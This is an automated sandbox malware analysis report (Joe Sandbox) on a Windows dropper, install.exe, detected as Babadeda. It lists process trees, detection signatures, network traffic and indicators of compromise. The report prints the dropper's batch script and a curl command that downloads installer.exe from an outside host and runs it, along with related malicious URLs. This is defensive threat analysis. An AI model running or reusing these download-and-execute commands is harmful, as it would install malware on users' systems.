Edit tour

Windows Analysis Report
install.exe

Overview

General Information

Sample name:	install.exe
Analysis ID:	1619164
MD5:	3e4d454632a75dfb3a024977190a3e22
SHA1:	10addb3b65ad03714f1b1f081ec75dea97a1c81e
SHA256:	ad134b16820dc49c200b7c2cfcae83e34ed2e3424484ffe47be8050521662471
Tags:	exeuser-skocherhan
Infos:

Detection

Babadeda

Score:	60
Range:	0 - 100
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Babadeda

Joe Sandbox ML detected suspicious sample

AV process strings found (often used to terminate AV products)

Contains functionality to dynamically determine API calls

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Usage Of Web Request Commands And Cmdlets

Uses 32bit PE files

Classification

Process Tree

System is w10x64

install.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\install.exe" MD5: 3E4D454632A75DFB3A024977190A3E22)

conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7364 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\F73F.tmp\F740.tmp\F741.bat C:\Users\user\Desktop\install.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

curl.exe (PID: 7380 cmdline: curl -o installer.exe api.secureserver.top/api/files/winpleskdedicated/installer.exe?key=winpleskdedicated MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Babadeda	According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.	No Attribution	https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities	https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
install.exe	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.install.exe.400000.0.unpack	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security
0.2.install.exe.400000.0.unpack	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security

Sigma Signatures

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: curl -o installer.exe api.secureserver.top/api/files/winpleskdedicated/installer.exe?key=winpleskdedicated, CommandLine: curl -o installer.exe api.secureserver.top/api/files/winpleskdedicated/installer.exe?key=winpleskdedicated, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\curl.exe, NewProcessName: C:\Windows\System32\curl.exe, OriginalFileName: C:\Windows\System32\curl.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\F73F.tmp\F740.tmp\F741.bat C:\Users\user\Desktop\install.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7364, ParentProcessName: cmd.exe, ProcessCommandLine: curl -o installer.exe api.secureserver.top/api/files/winpleskdedicated/installer.exe?key=winpleskdedicated, ProcessId: 7380, ProcessName: curl.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: install.exe	ReversingLabs: Detection: 50%
Source: install.exe	Virustotal: Detection: 43%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: install.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\install.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	File opened: C:\Users\user\AppData\Local\Temp\F73F.tmp\	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	File opened: C:\Users\user\AppData\Local\Temp\F73F.tmp\F740.tmp\	Jump to behavior

Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /api/files/winpleskdedicated/installer.exe?key=winpleskdedicated HTTP/1.1Host: api.secureserver.topUser-Agent: curl/7.83.1Accept: */*

Source: global traffic

DNS traffic detected: DNS query: api.secureserver.top

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 19 Feb 2025 15:33:05 GMTContent-Type: text/plain; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: no-cache, privateCF-Cache-Status: BYPASSSet-Cookie: XSRF-TOKEN=eyJpdiI6InVkZ0lFcUN6NllaTXZ0VnhyTlwveUlnPT0iLCJ2YWx1ZSI6Inp2aWpWQjk5MnpyWnFDVkY3bU16MFdwSld6VEdDNVNrQUh0MDgyMExaZ1REY0JzbHloQTdKM2tkRzZZTXhDcXgiLCJtYWMiOiJhYTFhYmUzOTE5MjY0MWExMGQ5Y2ZjYTliODFhNDhhMTA0OGM4MTQ5OGM1ZTFmNGZiMDJiYzVmNWUwMzE0MTdjIn0%3D; expires=Wed, 19-Feb-2025 17:33:05 GMT; Max-Age=7200; path=/Set-Cookie: laravel_session=eyJpdiI6IkcyNVl6YzJ0d1N6bjRKbUZwXC9ETGp3PT0iLCJ2YWx1ZSI6ImdpeXdOdFpUWnZ0YlU3cHpJZWJMejlSbUtoN3JEZ29OeG83XC9WMDRHeXZNRlJrdjdpNnpUb3FXSGZOazNYOU16IiwibWFjIjoiODQ2Nzg1MjIxZDM2ZDA0MTdlMjU3OTNmYmM5YTMzMjk5Zjc1Yzc0NWFhMzZjOGYyMzAyNGI5YTM4ZjE1OGY2ZiJ9; expires=Wed, 19-Feb-2025 17:33:05 GMT; Max-Age=7200; path=/; httponlyReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xSPUVxFDvYW21qAWSkgmCNtn%2BnXtNL3Hyh9e0wJ9BL59AJjT4x7tbQqKBsFeJi883iNN%2Fyu%2FqVX9ye2Mft15wO5i9XjA5W9PnO1WPyuOpu5R9Ibq49MP1aqgAhrsPa03HcP8B0t8rQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: clData Raw: Data Ascii:

Source: curl.exe, 00000003.00000003.2054783401.000002CF3A50D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.secureserver.top/api/files/winpleskdedicated/installer.exe?key=winpleskdedicated
Source: Amcache.hve.2.dr	String found in binary or memory: http://upx.sf.net

Source: C:\Windows\System32\cmd.exe	File created: C:\Windows\licmon			Jump to behavior
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\licmon\installer.exe			Jump to behavior

Source: C:\Users\user\Desktop\install.exe	Code function: 0_2_00411079	0_2_00411079
Source: C:\Users\user\Desktop\install.exe	Code function: 0_2_00411C20	0_2_00411C20
Source: C:\Users\user\Desktop\install.exe	Code function: 0_2_00411033	0_2_00411033
Source: C:\Users\user\Desktop\install.exe	Code function: 0_2_00410C80	0_2_00410C80
Source: C:\Users\user\Desktop\install.exe	Code function: 0_2_00410CA0	0_2_00410CA0
Source: C:\Users\user\Desktop\install.exe	Code function: 0_2_0040B9C7	0_2_0040B9C7
Source: C:\Users\user\Desktop\install.exe	Code function: 0_2_0040FA68	0_2_0040FA68
Source: C:\Users\user\Desktop\install.exe	Code function: 0_2_0040CF18	0_2_0040CF18
Source: C:\Users\user\Desktop\install.exe	Code function: 0_2_0040EFF0	0_2_0040EFF0
Source: C:\Users\user\Desktop\install.exe	Code function: 0_2_00410FB0	0_2_00410FB0

Source: install.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal60.troj.winEXE@7/5@1/2

Source: C:\Users\user\Desktop\install.exe

Code function: 0_2_00402664 LoadResource,SizeofResource,FreeResource,

0_2_00402664

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7320:120:WilError_03

Source: C:\Users\user\Desktop\install.exe

File created: C:\Users\user\AppData\Local\Temp\F73F.tmp

Jump to behavior

Source: C:\Users\user\Desktop\install.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\F73F.tmp\F740.tmp\F741.bat C:\Users\user\Desktop\install.exe"

Source: C:\Users\user\Desktop\install.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: install.exe	ReversingLabs: Detection: 50%
Source: install.exe	Virustotal: Detection: 43%

Source: unknown	Process created: C:\Users\user\Desktop\install.exe "C:\Users\user\Desktop\install.exe"
Source: C:\Users\user\Desktop\install.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\install.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\F73F.tmp\F740.tmp\F741.bat C:\Users\user\Desktop\install.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -o installer.exe api.secureserver.top/api/files/winpleskdedicated/installer.exe?key=winpleskdedicated
Source: C:\Users\user\Desktop\install.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\F73F.tmp\F740.tmp\F741.bat C:\Users\user\Desktop\install.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -o installer.exe api.secureserver.top/api/files/winpleskdedicated/installer.exe?key=winpleskdedicated	Jump to behavior

Source: C:\Users\user\Desktop\install.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Data Obfuscation

Yara detected Babadeda

Source: Yara match	File source: install.exe, type: SAMPLE
Source: Yara match	File source: 0.0.install.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.install.exe.400000.0.unpack, type: UNPACKEDPE

Source: C:\Users\user\Desktop\install.exe

Code function: 0_2_0040ADD6 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,

0_2_0040ADD6

Source: install.exe

Static PE information: section name: .code

Source: C:\Users\user\Desktop\install.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\install.exe

Window / User API: threadDelayed 394

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\install.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	File opened: C:\Users\user\AppData\Local\Temp\F73F.tmp\	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Users\user\Desktop\install.exe	File opened: C:\Users\user\AppData\Local\Temp\F73F.tmp\F740.tmp\	Jump to behavior

Source: Amcache.hve.2.dr	Binary or memory string: VMware
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.2.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.2.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.2.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.2.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.2.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.2.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: curl.exe, 00000003.00000003.2054824737.000002CF3A504000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.2.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.2.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.2.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.2.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.2.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.2.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.2.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.2.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.2.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.2.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\install.exe

Code function: 0_2_0040ADD6 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,

0_2_0040ADD6

Source: C:\Users\user\Desktop\install.exe	Code function: 0_2_00409FD0 SetUnhandledExceptionFilter,		0_2_00409FD0
Source: C:\Users\user\Desktop\install.exe	Code function: 0_2_00409FB0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,		0_2_00409FB0

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\curl.exe curl -o installer.exe api.secureserver.top/api/files/winpleskdedicated/installer.exe?key=winpleskdedicated

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\install.exe

Code function: 0_2_00405573 GetVersionExW,GetVersionExW,

0_2_00405573

Source: Amcache.hve.2.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Native API	1 Scripting	11 Process Injection	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Process Injection	LSASS Memory	1 Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	12 System Information Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
install.exe	50%	ReversingLabs	Win32.Trojan.Generic
install.exe	44%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
http://api.secureserver.top/api/files/winpleskdedicated/installer.exe?key=winpleskdedicated	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.secureserver.top	104.21.48.1	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://api.secureserver.top/api/files/winpleskdedicated/installer.exe?key=winpleskdedicated	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.48.1	api.secureserver.top	United States		13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1619164
Start date and time:	2025-02-19 16:32:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	install.exe
Detection:	MAL
Classification:	mal60.troj.winEXE@7/5@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 29 Number of non-executed functions: 53
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Not all processes where analyzed, report is missing behavior information

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.48.1	ZmK1CAc4VP.exe	Get hash	malicious	FormBook	Browse	www.tumbetgirislinki.fit/4wrd/
	uI1A364y2P.exe	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/jgkl/
	QUOTATION NO REQ-19-000640.exe	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/am6a/
	LLLLLLLLASSSEERRRR.ps1	Get hash	malicious	FormBook	Browse	www.tumbetgirislinki.fit/k566/
	laserl.ps1	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/jgkl/?y2IHp=hI+cEEoDMRK5HtHlz4V8IEOzbfVROUzo+nuR9x41ri89hVkyLZ4bVRvwmPB4YpqMZl4/b+D+8qc7dcfD2Dlpe8No0hPfAwO5oFY7qBV6wzFyOtp6qA==&iLy=Wfpx
	laserrrrrrrr.ps1	Get hash	malicious	FormBook	Browse	www.tumbetgirislinki.fit/k566/
	DHL parcel.exe	Get hash	malicious	FormBook	Browse	www.kdrqcyusevx.info/q64t/
	BIS_MT103 101T000000121121.exe	Get hash	malicious	FormBook	Browse	www.newanthoperso.shop/y5uj/
	DDT-5080-ST233.exe	Get hash	malicious	FormBook	Browse	www.sigaque.today/vyp9/
	r53YFSyurTyIZZMd.exe	Get hash	malicious	FormBook	Browse	www.clouser.store/0izs/

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Donaldson-required specs-documents.pdf(1).html	Get hash	malicious	Unknown	Browse	172.67.220.142
	SecuriteInfo.com.Win32.MalwareX-gen.29065.15783.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	sample.html	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	sample.html	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	4b6f2bf6-2740-8aa6-69f5-11a725d4ccd9.eml	Get hash	malicious	Unknown	Browse	104.26.11.196
	http://era.ca	Get hash	malicious	Unknown	Browse	172.64.150.44
	http://loginmicrosoftonlinesettings.utzsnacks.ventarronllanero.com/reset/authorize?email=priceandpromosupport@utzsnacks.com	Get hash	malicious	HTMLPhisher	Browse	104.16.230.132
	https://atstrack.com/customer-support/software.html	Get hash	malicious	Unknown	Browse	104.22.22.186
	https://appurl.io/F_tBwtMcbk	Get hash	malicious	Unknown	Browse	104.21.69.238
	Implosions.exe	Get hash	malicious	RedLine	Browse	172.67.75.172

Process:	C:\Users\user\Desktop\install.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	273
Entropy (8bit):	4.988292235209252
Encrypted:	false
SSDEEP:	6:NS01f912SgbuWNEfNVOXLICbFDgOXLMVXikpOXL4ekFqLWREgXL6Nu:NSu9o3uAOuXJbFlXgvpOX+FqiTXEu
MD5:	88BB18EE5991E273D03733BD4A87E458
SHA1:	F0A88DEACE4D5120A30D11EE21EB35C49CDCDF41
SHA-256:	BF0CB41983D064B8FCED4248130A104A535F683D94F49D1F59BE1EBE63AFB58D
SHA-512:	35D16BD39D68F74C9D0EFAA7A093005084A24CED36E4468E5FA8AF31AC99A1FA9E648CC73F1B163D4148E69E8E3DB28524E25BA5700028456FE215890E267BBC
Malicious:	false
Reputation:	low
Preview:	@shift /0..@echo off....cd C:\Windows..@RD /S /Q "C:\Windows\licmon" 2>NUL..mkdir licmon 2>NUL..cd licmon 2>NUL..del installer.exe 2>NUL..curl -o installer.exe api.secureserver.top/api/files/winpleskdedicated/installer.exe?key=winpleskdedicated 2>NUL..installer.exe..:: End

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.418972265813879
Encrypted:	false
SSDEEP:	6144:GSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNd0uhiTw:lvloTMW+EZMM6DFyn03w
MD5:	A107D3DBA1FC3510CC0F58604EB84730
SHA1:	DB7B84CBF16B03B9E1280E629DEA64728FB46B39
SHA-256:	030F7567B4789619B69728E7F1BEED0DFD903013060794CF1FC246F014B519C0
SHA-512:	652B7D985777E94E9F3FDB3274DA39F793E8428F844472F4C9377DA9A91E1BB8E3C6311464EC2B983361979E15CE7F2B9A485516E76727241F31C1D588548EF8
Malicious:	false
Reputation:	low
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm"..................................................................................................................................................................................................................................................................................................................................................g...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\licmon\installer.exe

Download File

Process:	C:\Windows\System32\curl.exe
File Type:	ASCII text, with no line terminators
Category:	modified
Size (bytes):	9
Entropy (8bit):	2.94770277922009
Encrypted:	false
SSDEEP:	3:+Fn:+F
MD5:	68FBA39BF5E9921EA84E938BB927FB30
SHA1:	BB0B4B65733B417F758A3F9BEE1FF227291E8462
SHA-256:	2F015C6D00613823357262F6D608360E3E7EB5CB9CF889A5B91193CE67B1B1B7
SHA-512:	C71F0937A637E676AA936B320A78DF2759453A0DD2B99AF25380462FC09C749F291DA14B031168D7E5CE12A786CB85979BDE9643D670DDBB998A4169E3597FE3
Malicious:	false
